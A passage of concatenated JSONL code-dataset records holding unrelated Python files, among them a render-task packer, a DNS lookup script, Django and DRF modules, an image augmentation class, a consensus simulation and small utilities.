enum.get_enum_num()\n cmd_render_task = enum.get_enum_num()\n cmd_response_render_task = enum.get_enum_num()\n cmd_unprocess_tasks = enum.get_enum_num()\n cmd_processing_tasks = enum.get_enum_num()\n cmd_processed_tasks = enum.get_enum_num()\n cmd_render_task_invalid = enum.get_enum_num()\n cmd_node_status_changed = enum.get_enum_num()\n cmd_node_working = enum.get_enum_num()\n cmd_sub_task_changed = 
enum.get_enum_num()\n cmd_sub_tasks_of_task = enum.get_enum_num()\n cmd_sub_task_rerender = enum.get_enum_num() \n cmd_sub_task = enum.get_enum_num() \n cmd_delete_tasks = enum.get_enum_num()\n cmd_tasks_deleted = enum.get_enum_num()\n cmd_stop_render_task = enum.get_enum_num()\n cmd_derive_task_created = enum.get_enum_num()\n\ndef rencmd_mux_add_task_cmd_data(task_id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n TaskName,\n RenderName,\n InputPath,\n InputFileName,\n OutputPath,\n Misc):\n \n fmt = '=IIIBHHHIIIH{0}sH{1}sH{2}sH{3}sH{4}sH{5}s'.format(len(TaskName),\n len(RenderName),\n len(InputPath),\n len(InputFileName),\n len(OutputPath),\n len(Misc))\n return struct.pack(fmt,\n task_id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n len(TaskName), TaskName,\n len(RenderName), RenderName,\n len(InputPath), InputPath,\n len(InputFileName), InputFileName,\n len(OutputPath), OutputPath,\n len(Misc), Misc)\n\ncmd_header_fmt='6I'\ncmd_header_len=struct.calcsize(cmd_header_fmt)\n\ndef rencmd_mux_cmd(dev_type, cmdid, sender_id, ipv4addr, cmd_data, cmd_extra_data):\n global cmd_header_fmt\n\n cmd_data_len = 0\n cmd_extra_data_len = 0\n if cmd_data:\n cmd_data_len = len(cmd_data)\n if cmd_extra_data:\n cmd_extra_data_len = len(cmd_extra_data)\n\n cmd_buf = struct.pack(cmd_header_fmt, dev_type, cmdid, sender_id, ipv4addr, cmd_data_len, cmd_extra_data_len)\n if cmd_data:\n cmd_buf += cmd_data\n if cmd_extra_data:\n cmd_buf += cmd_extra_data\n return cmd_buf\n","sub_path":"cgPipeline/test/AddTask.py","file_name":"AddTask.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102225758","text":"'''\nProgram that takes in user input of a domain name and utilizes 'dig' similar to terminal command, which prints out a query from CNAME to A\n\nsource: http://www.dnspython.org/examples.html\nhttps://stackoverflow.com/questions/5235569/using-the-dig-command-in-python\nAuthor: Benny Fung\n'''\nimport socket\nimport argparse\nimport dns.resolver, sys\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-d', help = \"Enter domain name [ex: www.yahoo.com]\")\n return parser.parse_args()\n\ndef dig(arg): #recursively prints out data from CNAME to A\n\thost = arg\n\ttry:\n\t\twhile True:\n\t\t\tfor rdata in dns.resolver.query(arg, 'CNAME'):\n\t\t\t\tprint(rdata.target)\n\t\t\t\thost = rdata.target\n\texcept:#recursively prints out data from CNAME to A\n\t\tfor rdata in dns.resolver.query(host):\n\t\t\tprint(rdata)\n\nif __name__ == '__main__':\n arg = parse_args()\n dig(arg)\n\n","sub_path":"dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516603709","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\n\"\"\"\n ==== SCRAPING\n\n 1. get all urls A-Z\n 2. get all job links within each category\n 3. 
follow each link and get metadata per job title (where applicable):\n -location\n -date\n -company\n -description\n -requirements\n -snapshot\n -pay\n -other pay\n -employment type\n -job type\n -education\n -experience\n -manages others\n -relocation\n -industry\n -required travel\n -job ID\n 4. follow 'apply link' and find all fields:\n -field label\n -field input\n\n expected output:\n\n {jobs: [\n {\n 'title': 'FOO',\n 'url': 'url',\n 'metadata': {\n 'keys': 'values'\n },\n formfields: {\n 'keys': 'values'\n }\n }\n ]}\n\n 5. compile and output to file, PER job\n\n 6. **OPTIONAL** graph output to find correlations\n\n ==== ANALYSIS\n\"\"\"\n\n\nclass JobDetail(Item):\n # define the fields for your item here like:\n url = Field()\n location = Field()\n date = Field()\n company = Field()\n description = Field()\n requirements = Field()\n snapshot = Field()\n pay = Field()\n other_pay = Field()\n employment_type = Field()\n job_type = Field()\n education = Field()\n experience = Field()\n manages_others = Field()\n relocation = Field()\n industry = Field()\n required_travel = Field()\n job_ID = Field()\n","sub_path":"jobs/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639805415","text":"\nfrom rest_framework.test import APITestCase\n\nfrom .testapp import models\n\n\nclass BackendTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n models.User.objects.create(username=\"user1\", email=\"user1@example.org\")\n models.User.objects.create(username=\"user2\", email=\"user2@example.org\")\n\n def test_django_filter_compatibility(self):\n response = self.client.get('/df-users/', {'username': 'user1'}, content_type='json')\n\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['username'], 'user1')\n","sub_path":"tests/test_backends.py","file_name":"test_backends.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417850843","text":"#!/usr/bin/env python\n\n\nfrom __future__ import print_function \nimport skimage as sk\nimport cv2\nimport numpy as np\nimport os\nimport random\nfrom yaml_reader import YamlReader \n\n\nclass Augment(YamlReader):\n def __init__(self,\n yaml_file = 'augment_config.yaml'):\n self.image_files = []\n self.keep_images = ['resized', 'augment', 'flipped',\n 'rot']\n super(Augment, self).__init__(yaml_file)\n self.parse()\n self._load_images()\n\n\n def _load_images(self):\n files = os.listdir(self.image_dir)\n exts = ['png', 'jpg', 'PNG', 'JPG', 'jpeg', 'tiff']\n not_load = ['resiz', 'augm', 'flip', 'gray']\n # the last filter is to avoid loading processed images\n self.image_files =\\\n [os.path.join(self.image_dir, f) for f in files\n if f.split('.')[-1] in exts and not\n any(ff in f for ff in not_load)]\n\n\n def do_grayscale(self):\n if not self.flag_gray:\n return\n for i, f in enumerate(self.image_files):\n bgr = cv2.imread(f)\n gray = cv2.cvtColor(bgr, cv2.COLOR_BGR2GRAY)\n if self.flag_equalise:\n gray = cv2.equalizeHist(gray)\n cv2.imwrite(os.path.join(\n self.image_dir, \"gray_%04d.png\" %i ), gray)\n\n\n def do_resize(self):\n files = [f for f in os.listdir(self.image_dir) \n if 'gray' in f or 'flip' in f]\n for i, f in enumerate(files):\n im = cv2.imread(os.path.join((self.image_dir), f))\n res = cv2.resize(im,\n (self.resized_width, self.resized_height))\n 
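# [Editor's aside, not part of the original script] cv2.resize defaults to
# bilinear interpolation (cv2.INTER_LINEAR); when shrinking images,
# cv2.INTER_AREA usually preserves detail better. A hedged sketch of the
# alternative call, reusing the same width/height attributes parsed from
# the YAML config:
#   res = cv2.resize(im, (self.resized_width, self.resized_height),
#                    interpolation=cv2.INTER_AREA)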
cv2.imwrite(os.path.join(self.image_dir,\n \"resized_%04d.png\" %i ), res)\n\n\n def do_flip(self, substr = 'gray'):\n if not self.flag_flip:\n return\n files = [f for f in os.listdir(self.image_dir) \n if substr in f]\n for f in files:\n im = cv2.imread(os.path.join((self.image_dir), f))\n im = im[:, ::-1]\n cv2.imwrite(os.path.join(self.image_dir,\n f.split('.')[0] + \"_flipped\" + \".png\"), im)\n\n\n def do_augment(self): \n files = [f for f in os.listdir(self.image_dir)\n if 'resized' in f]\n assert len(files) > 0,\\\n \"do_augment() operates on resized files.\\\n Call do_resize() first.\"\n for i, f in enumerate(files):\n im = cv2.imread(os.path.join(self.image_dir, f))\n for r in range(self.n_rotations):\n random_degree = random.uniform(self.min_angle,\n self.max_angle)\n im = sk.transform.rotate(im,\n random_degree, mode = 'edge')\n if self.flag_noise:\n im = sk.util.random_noise(im)\n im = np.array(255 * im, np.uint8)\n cv2.imwrite(os.path.join(self.image_dir,\n \"augmented_%04d_rot_%03d.png\" %(i,r) ), im)\n\n\n def do_clean(self):\n for f in self.image_files:\n if all(k not in f for k in self.keep_images):\n os.remove(f)\n","sub_path":"tools/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144335213","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\nDEFAULT = 'None'\n\n\ndef give_existing_records_sane_defaults(apps, schema_editor):\n # Clean up any records with blank strings. Nulls are handled by AlterField.\n school_class = apps.get_model('web', 'School')\n school_class.objects.select_for_update()\\\n .filter(mediasite_root_folder='')\\\n .update(mediasite_root_folder=DEFAULT)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0006_auto_20160604_0814'),\n ]\n\n operations = [\n # The AlterField migration below doesn't automatically convert blank\n # strings saved in the DB to 'None' (it only handles null fields), so\n # we need to clean these fields up manually.\n migrations.RunPython(\n code=give_existing_records_sane_defaults,\n reverse_code=migrations.RunPython.noop,\n ),\n # Note there are NO defaults set in the actual model, because we don't\n # want users or code to add web_school records without specifying a\n # root folder, so this migration performs cleanup of the existing\n # records in the table to ensure there are no blank\n # mediasite_root_folder fields, without persisting a default in the\n # model itself. The user is responsible for fixing the\n # data so it makes sense (i.e. 
so that integrations which shouldn't be\n # using 'None' as the root folder are updated manually or removed from\n # the database entirely); the timing of this manual cleanup can be\n # independent of the actual migration.\n migrations.AlterField(\n model_name='school',\n name='mediasite_root_folder',\n field=models.TextField(\n null=False, # do not allow empty field (DB-level constraint)\n blank=False, # do not allow empty strings in field\n # (Django only; not a DB-level constraint)\n default=DEFAULT), # temporary default for migration only\n preserve_default=False # default is not permanent in model\n ),\n ]\n","sub_path":"web/migrations/0007_mediasite_root_folder_required_20161019_1943.py","file_name":"0007_mediasite_root_folder_required_20161019_1943.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635910749","text":"from rest_framework.serializers import (\n ModelSerializer,\n HyperlinkedIdentityField,\n HyperlinkedModelSerializer,\n SerializerMethodField,\n CharField,\n)\n\nfrom posts.models import Post\nfrom tags.models import (\n AlcoholTag,\n FoodTag,\n PlaceTag,\n)\n\nalcohol_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:alcohol-detail',\n lookup_field='pk',\n)\n\nfood_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:food-detail',\n lookup_field='pk',\n)\n\nplace_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:place-detail',\n lookup_field='pk',\n)\n\n\nclass PostSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = Post\n fields = [\n 'url',\n 'id',\n 'content',\n ]\n\n def get_url(self, obj):\n absolute_url = Post.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass AlcoholTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'url',\n 'id',\n 'alcohol_name',\n ]\n\n def get_url(self, obj):\n absolute_url = AlcoholTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass AlcoholTagDetailSerializer(ModelSerializer):\n posts = SerializerMethodField()\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'id',\n 'alcohol_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass AlcoholTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'id',\n 'alcohol_name',\n ]\n\n\nclass FoodTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = FoodTag\n fields = [\n 'url',\n 'id',\n 'food_name',\n ]\n\n def get_url(self, obj):\n absolute_url = FoodTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass FoodTagDetailSerializer(ModelSerializer):\n posts = SerializerMethodField()\n\n class Meta:\n model = FoodTag\n fields = [\n 'id',\n 'food_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass FoodTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = FoodTag\n fields = [\n 'id',\n 'food_name',\n ]\n\n\nclass PlaceTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = PlaceTag\n fields = [\n 'url',\n 'id',\n 'place_name',\n 
]\n\n def get_url(self, obj):\n absolute_url = PlaceTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass PlaceTagDetailSerializer(ModelSerializer):\n\n posts = SerializerMethodField()\n\n class Meta:\n model = PlaceTag\n fields = [\n 'id',\n 'place_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass PlaceTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = PlaceTag\n fields = [\n 'id',\n 'place_name',\n ]\n","sub_path":"sooljottagrae/apis/serializers/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525810899","text":"#coding:utf-8\n\nimport os, sys\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom random import randint\nfrom models import User, Pet, Photo\n\nuser = User.objects().first()\n\ncat = Pet()\ncat.name = 'kity'\ncat.avatar_url = 'http://www.ermiao.com/media/uploads/avatar/2a13363c7ddd4d2ca827fc477543cec6_resized.jpg'\ncat.user = user\ncat.pet_type = 0\ncat.save()\n\ndog = Pet()\ndog.name = 'gou'\ndog.avatar_url = 'http://www.ermiao.com/media/uploads/avatar/2a13363c7ddd4d2ca827fc477543cec6_resized.jpg'\ndog.user = user\ndog.pet_type = 1\ndog.save()\n\nfor i in xrange(100):\n photo = Photo()\n photo.image_url = 'http://www.ermiao.com/media/uploads/pet/6fc6b40c00634c7e81676e4a14bb86ea_resized_w_160.jpg'\n photo.pet = cat\n photo.pet_type = cat.pet_type\n photo.user = user\n photo.text = u\"喵喵\"\n photo.like_count = randint(0,30)\n photo.save()\n\nfor i in xrange(50):\n photo = Photo()\n photo.image_url = 'http://www.ermiao.com/media/uploads/pet/a72c98f9626b45308679069c93d714a8_resized_w_450.jpg'\n photo.pet = dog\n photo.pet_type = dog.pet_type\n photo.user = user\n photo.text = u\"汪汪\"\n photo.like_count = randint(0,25)\n photo.save()\n","sub_path":"flask_example/ermiao/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596818697","text":"from __future__ import print_function\nimport random\nfrom Node import *\nfrom catx import *\nfrom Transaction import *\nfrom Candidate import *\n\ndef main(args):\n##\n##\n## // There are four required command line arguments: p_graph (.1, .2, .3),\n## // p_malicious (.15, .30, .45), p_txDistribution (.01, .05, .10), \n## // and numRounds (10, 20). You should try to test your CompliantNode\n## // code for all 3x3x3x2 = 54 combinations.\n## \n numNodes = 100;\n p_graph = float(args[1]) # // parameter for random graph: \n # // prob. that an edge will exist\n p_malicious = float(args[2]) # // prob. 
that a node will be set to be malicious\n p_txDistribution = float(args[3]) #// probability of assigning an initial transaction to each node \n numRounds = float(args[4]) #// number of simulation rounds your nodes will run for\n\n # // pick which nodes are malicious and which are compliant\n nodes = [None for i in range(numNodes)]\n mal = 0\n com = 0\n for i in range(numNodes):\n if(random.random() < p_malicious):\n # // When you are ready to try testing with malicious nodes, replace the\n # // instantiation below with an instantiation of a MaliciousNode\n nodes[i] = MaliciousNode(p_graph, p_malicious, p_txDistribution, numRounds)\n mal = mal + 1\n else:\n nodes[i] = CompliantNode(p_graph, p_malicious, p_txDistribution, numRounds)\n com = com + 1\n \n print(\"{} malicious nodes and {} compliant nodes\".format(mal,com))\n\n followees = [[1 if random.random() < p_graph and i!= j else 0 for i in range(numNodes)] for j in range(numNodes)]\n for i in range(numNodes):\n nodes[i].setFollowees(followees[i]);\n\n## // initialize a set of 500 valid Transactions with random ids\n numTx = 500\n validTxIds = []\n for i in range(numTx):\n validTxIds.append(random.randint(1000,50000))\n \n\n##\n## // distribute the 500 Transactions throughout the nodes, to initialize\n## // the starting state of Transactions each node has heard. The distribution\n## // is random with probability p_txDistribution for each Transaction-Node pair.\n\n for i in range(numNodes):\n pendingTransactions = []\n for txid in validTxIds:\n if (random.random() < p_txDistribution): #// p_txDistribution is .01, .05, or .10.\n pendingTransactions.append(Transaction(txid))\n nodes[i].setPendingTransaction(pendingTransactions)\n\n numRounds = int(numRounds)\n for round in range(numRounds):\n## // gather all the proposals into a map. The key is the index of the node receiving\n## // proposals. The value is an List containing pairs. The first\n## // element is the id of the transaction being proposed and the second\n## // element is the index # of the node proposing the transaction.\n allProposals = {}\n ## allProposals = { idx1: [cand1, cand2, ...], idx2: [...] 
}\n\n for i in range(numNodes):\n proposals = nodes[i].sendToFollowers()\n for tx in proposals:\n if (tx not in validTxIds):\n continue #// ensure that each tx is actually valid\n\n for j in range(numNodes):\n if (not followees[j][i]):\n continue ## tx only matters if j follows i\n\n if (j not in allProposals):\n allProposals[j] = [] ## key: j; value: [list]\n\n candidate = Candidate(tx, i)\n allProposals[j].append(candidate)\n \n## // Distribute the Proposals to their intended recipients as Candidates\n for i in range(numNodes):\n if (i in allProposals):\n nodes[i].receiveFromFollowees(allProposals.get(i));\n\n transactions = nodes[i].sendToFollowers()\n\n # save to file\n \n filename = \"results/\"+\"round_\"+str(round)+\"_node_\"+str(i)+\".txt\"\n f = open(filename,\"w+\")\n for tx in transactions:\n f.write(str(tx.id)+\"\\n\")\n f.close()\n \n \n \n\n # // print results\n for i in range(numNodes):\n transactions = nodes[i].sendToFollowers()\n print(\"Transaction ids that Node \" + str(i) + \" believes consensus on: \", end=\"\")\n '''\n for tx in transactions:\n print(\"{} \".format(tx.id), end='')\n print(\"\")\n '''\n print(\"{} transactions\".format(len(transactions)))\n\n\n\n\n\n\nif __name__ == '__main__':\n from sys import argv\n main(argv)","sub_path":"Assignment_2/py/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70730559","text":"from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.core.window import Window\nfrom win32api import GetSystemMetrics\nfrom kivy.config import Config\nfrom kivy.uix.textinput import TextInput\n\nimport src.Game as G\nimport src.Board as B\n\n\nclass BoardGrid(GridLayout):\n def __init__(self, **kwargs):\n self.mode = kwargs.pop('mode')\n super(BoardGrid, self).__init__(**kwargs)\n self.cols = 10\n self.rows = 10\n self.fill_grid()\n\n def fill_grid(self):\n board = g.player1.board\n col = board.columns[:10]\n row = board.index\n\n if self.mode == 'player':\n board_list = board.iloc[:,:10].stack().tolist()\n if self.mode == 'opponent':\n board_list = board.iloc[:,12:].stack().tolist()\n print(self.mode)\n for i in board_list:\n self.btn = ToggleButton(text=str(i))\n self.add_widget(self.btn)\n self.btn.bind(on_press=self.pressed)\n\n\n def pressed(self,instance):\n winner = g.goRound()\n\n\nclass WindowGrid(GridLayout):\n def __init__(self):\n super(WindowGrid, self).__init__()\n #Window.size = (GetSystemMetrics(0),GetSystemMetrics(1))\n Window.size = (960,600)\n self.cols = 3\n self.rows = 3\n\n\n self.add_widget(Label(text='Your ships'))\n self.add_widget(Label(text=str(Window.size)))\n self.add_widget(Label(text='Opponent ships'))\n self.add_widget(BoardGrid(mode='player'))\n self.add_widget(Label(text=''))\n self.add_widget(BoardGrid(mode='opponent'))\n self.add_widget(Label(text=''))\n self.add_widget(Label(text=''))\n self.add_widget(Label(text=''))\n\n\n\nclass ShipsApp(App):\n def build(self):\n return WindowGrid()\n\nif __name__ == \"__main__\":\n b1 = B.Board('Computer 1')\n b2 = B.Board('Computer 2')\n g = G.Game(b1, b2)\n ShipsApp().run()\n","sub_path":"src/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236113950","text":"import argparse\nimport os\nimport warnings\nfrom 
importlib import import_module\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef run_exp() -> None:\n exp_file_list = [e for e in os.listdir(\"src/exp\") if args.exp in e]\n assert len(exp_file_list) == 1\n exp_module: str = os.path.splitext(exp_file_list[0])[0] # [exp000] -> exp000\n module = import_module(f\"src.exp.{exp_module}.main\")\n print(f\"execute main in src/exp/{exp_module}/main.py\")\n module.main(args.debug) # type: ignore\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-e\", \"--exp\", type=str, required=True, help=\"experiment filename\"\n )\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"debug mode\")\n parser.set_defaults(func=run_exp)\n args = parser.parse_args()\n args.func()\n","sub_path":"scripts/_run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164115158","text":"from random import randint\n\nDESCRIPTION = 'Answer \"yes\" if given number is prime. Otherwise answer \"no\".'\n\n\ndef is_prime(n):\n if n <= 1:\n return False\n divisor = 2\n while divisor <= n / 2:\n if n % divisor == 0:\n return False\n break\n else:\n divisor += 1\n return True\n\n\ndef generate_answer_and_question():\n num = randint(1, 100)\n if is_prime(num):\n correct_answer = 'yes'\n else:\n correct_answer = 'no'\n question = str(num)\n return correct_answer, question\n","sub_path":"brain_games/games/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501599570","text":"\"\"\"\nDjango settings for testproject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '--1oh7*5-1_rr%*34^&@e^b59(vgv=zm1wt(wm1ga=pfm73(9i'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'djrichtextfield',\n 'testproject.testapp',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'testproject.urls'\n\nWSGI_APPLICATION = 'testproject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# 
https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n\n# Use discover_runner for Django < 1.6\ntry:\n from django.test.runner import DiscoverRunner # noqa\nexcept ImportError:\n TEST_RUNNER = 'discover_runner.DiscoverRunner'\n\n\n# Django Rich Text Field\nTINYMCE_CONFIG = {\n 'js': ['//tinymce.cachefly.net/4.1/tinymce.min.js'],\n 'init_template': 'djrichtextfield/init/tinymce.js',\n 'settings': {\n 'menubar': False,\n 'plugins': 'link image table code',\n 'toolbar': 'formatselect | bold italic | removeformat |'\n ' link unlink image table | code',\n 'block_formats': 'Paragraph=p;Header 1=h1;Header 2=h2;Header 3=h3',\n 'width': 700\n },\n 'profiles': {\n 'mini': {\n 'toolbar': 'bold italic | removeformat'\n }\n }\n}\n\nCKEDITOR_CONFIG = {\n 'js': ['//cdn.ckeditor.com/4.4.4/standard/ckeditor.js'],\n 'init_template': 'djrichtextfield/init/ckeditor.js',\n 'settings': {\n 'toolbar': [\n {'items': ['Format', '-', 'Bold', 'Italic', '-', 'RemoveFormat']},\n {'items': ['Link', 'Unlink', 'Image', 'Table']},\n {'items': ['Source']}\n ],\n 'format_tags': 'p;h1;h2;h3',\n 'width': 700,\n },\n 'profiles': {\n 'mini': {\n 'toolbar': [\n {'items': ['Bold', 'Italic', '-', 'RemoveFormat']},\n ]\n }\n }\n}\n\nDJRICHTEXTFIELD_CONFIG = CKEDITOR_CONFIG\n","sub_path":"Django_RichField/django-richtextfield-master/testproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159561114","text":"import random\nimport cProfile\n\n\n\ndef random_list_1(n):\n '''\n Best case: O(n) Worst case: O(infinity)\n If the random int is not in the new list every time it is called, the \n running time should be like a single iterating of the length which \n should have a running time of n.\n If the random int is already in the list, which if the randomness is \n perfect, every time it is called, the running time would take infinite \n time.\n\n :param n:\n :return:\n '''\n list_ = []\n while len(list_) < n:\n rand_ = random.randint(0,n)\n if rand_ not in list_:\n list_.append(rand_)\n return list_\n\n\ndef random_list_2(n):\n '''\n O(n ** 2)\n For every iteration of size n, preform a del which takes n time\n\n :param n:\n :return:\n '''\n list_ = []\n for i in xrange(n):\n list_.append(i)\n out_ = []\n\n while list_:\n random_n = random.randint(0,len(list_) - 1)\n random_member = list_[random_n]\n del(list_[random_n])\n out_.append(random_member)\n return out_\n\n\ndef random_list_3(n):\n '''\n O(n)\n n iterations to build list_ then shuffle which takes n time.\n\n :param n:\n :return:\n '''\n list_ = []\n for i in xrange(n):\n list_.append(i)\n random.shuffle(list_)\n return list_\n\ncProfile.run('random_list_1(10000)')\ncProfile.run('random_list_2(10000)')\ncProfile.run('random_list_3(10000)')\n","sub_path":"rand_list.py","file_name":"rand_list.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76529991","text":"from collections import defaultdict\n\n\nclass Vocabulary:\n def __init__(self, unk_symbol, sos_symbol=None, eos_symbol=None):\n # NOTE: keep these two updated with each other\n self.unk_symbol = unk_symbol\n self.w2i = defaultdict(lambda: len(self.w2i))\n 
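# [Editor's aside, not in the original file] the defaultdict factory above
# hands out the next free index the first time an unseen word is looked up,
# because the missing key is only inserted after the factory runs, e.g.:
#   >>> d = defaultdict(lambda: len(d))
#   >>> d['a'], d['b'], d['a']
#   (0, 1, 0)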
self.i2w = dict()\n self.is_frozen = False\n self.unk_idx = self.__getitem__(unk_symbol) # add to 0th index\n if sos_symbol:\n self.sos_symbol = sos_symbol\n self.sos_idx = self.__getitem__(sos_symbol)\n if eos_symbol:\n self.eos = eos_symbol\n self.eos_idx = self.__getitem__(eos_symbol)\n\n def __getitem__(self, word):\n \"\"\"\n Get the index of the word in the vocab. If it is not in the vocab and the vocab is not frozen,\n add it to the vocab.\n \"\"\"\n if self.is_frozen:\n if word in self.w2i:\n return self.w2i[word]\n return self.unk_idx\n index = self.w2i[word]\n self.i2w[index] = word\n return index\n\n def __len__(self):\n return len(self.w2i)\n\n def freeze(self):\n self.is_frozen = True\n\n\nif __name__ == '__main__':\n print('Testing...')\n v = Vocabulary('')\n assert(len(v) == 1)\n assert(v['hello'] == 1)\n assert(len(v) == 2)\n assert(list(v.w2i.keys()) == ['', 'hello'])\n assert(list(v.i2w.keys()) == [0, 1])\n v.freeze()\n assert(v['hello'] == 1)\n assert(v['hi'] == 0)\n assert(len(v) == 2)\n print('Done.')\n","sub_path":"vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208376957","text":"'''\nSugar: capacity 3, durability 0, flavor 0, texture -3, calories 2\nSprinkles: capacity -3, durability 3, flavor 0, texture 0, calories 9\nCandy: capacity -1, 